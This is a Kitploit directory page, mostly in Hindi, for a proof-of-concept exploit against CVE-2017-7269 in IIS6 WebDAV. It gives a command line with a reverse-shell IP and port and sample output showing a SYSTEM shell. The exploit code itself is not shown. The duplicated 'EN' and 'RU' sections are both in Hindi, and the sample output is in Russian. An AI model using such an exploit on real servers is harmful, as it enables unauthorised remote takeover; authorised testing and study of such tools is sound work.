Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7269 — यह एक PoC उपकरण है जो IIS6 के WebDAV घटक में एक ज्ञात भेद्यता के लिए शोषण प्रदर्शित करता है | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2017-7269
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

यह एक PoC उपकरण है जो IIS6 के WebDAV घटक में एक ज्ञात भेद्यता के लिए शोषण प्रदर्शित करता है

रिपॉजिटरी देखें
421 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenWebDavIISExploit एक PoC उपकरण है जो IIS6 के WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए डिज़ाइन किया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।

अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।

विशेषताएँ

  • कमजोर IIS6 WebDAV सर्वरों पर रिमोट कोड निष्पादन।
  • उपयोगकर्ता-निर्दिष्ट रिवर्स IP और पोर्ट के साथ गतिशील पेलोड निर्माण।
  • त्वरित शोषण के लिए उपयोग में आसान कमांड-लाइन इंटरफ़ेस।

आवश्यक शर्तें

  • Python 3.x: सुनिश्चित करें कि आपके सिस्टम पर Python 3 स्थापित है।
  • नेटवर्क एक्सेस: लक्ष्य मशीन के IP और पोर्ट से कनेक्ट करने की क्षमता।

उपयोग

कमांड-लाइन आर्गुमेंट्स

  • लक्ष्य IP: लक्ष्य IIS6 WebDAV सर्वर का IP पता।
  • लक्ष्य पोर्ट: वह पोर्ट नंबर जिस पर WebDAV सेवा चल रही है (आमतौर पर 80)।
  • रिवर्स IP: आपका IP पता जहाँ रिवर्स शेल को कनेक्ट होना चाहिए।
  • रिवर्स पोर्ट: रिवर्स शेल प्राप्त करने के लिए आपके सिस्टम पर पोर्ट नंबर।

उदाहरण

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

उपयोग उदाहरण

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

उदाहरण आउटपुट

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

नोट्स

  • सुनिश्चित करें कि आने वाले रिवर्स शेल को कैप्चर करने के लिए आपके पास निर्दिष्ट रिवर्स पोर्ट पर एक लिसनर चल रहा है।
  • इस उपकरण का उपयोग केवल अधिकृत सिस्टम पर कमजोरियों के परीक्षण के लिए करें।

RU

GenWebDavIISExploit एक PoC उपकरण है जो IIS6 पर WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए बनाया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।

अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।

विशेषताएँ

  • कमजोर IIS6 WebDAV सर्वरों पर रिमोट कोड निष्पादन।
  • रिवर्स कनेक्शन के लिए IP और पोर्ट निर्दिष्ट करके गतिशील पेलोड का निर्माण।
  • त्वरित उपयोग के लिए सरल कमांड-लाइन इंटरफ़ेस।

आवश्यक शर्तें

  • Python 3.x: सुनिश्चित करें कि आपके पास Python 3 स्थापित है।
  • नेटवर्क तक पहुंच: लक्ष्य मशीन के IP पते और पोर्ट से कनेक्ट करने की क्षमता।

उपयोग

कमांड-लाइन आर्गुमेंट्स

  • लक्ष्य IP: लक्ष्य IIS6 WebDAV सर्वर का IP पता।
  • लक्ष्य पोर्ट: वह पोर्ट नंबर जिस पर WebDAV सेवा चल रही है (आमतौर पर 80)।
  • रिवर्स IP: आपका IP पता, जिस पर रिवर्स कनेक्शन स्थापित होना चाहिए।
  • रिवर्स पोर्ट: रिवर्स कनेक्शन प्राप्त करने के लिए आपके सिस्टम पर पोर्ट नंबर।

उदाहरण

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

उपयोग उदाहरण

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

उदाहरण आउटपुट

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

नोट्स

  • सुनिश्चित करें कि आने वाले रिवर्स कनेक्शन को पकड़ने के लिए आपके पास निर्दिष्ट रिवर्स पोर्ट पर एक लिसनर चल रहा है।
  • इस उपकरण का उपयोग केवल अधिकृत सिस्टम पर कमजोरियों की जांच के लिए करें।
टूल डाउनलोड करें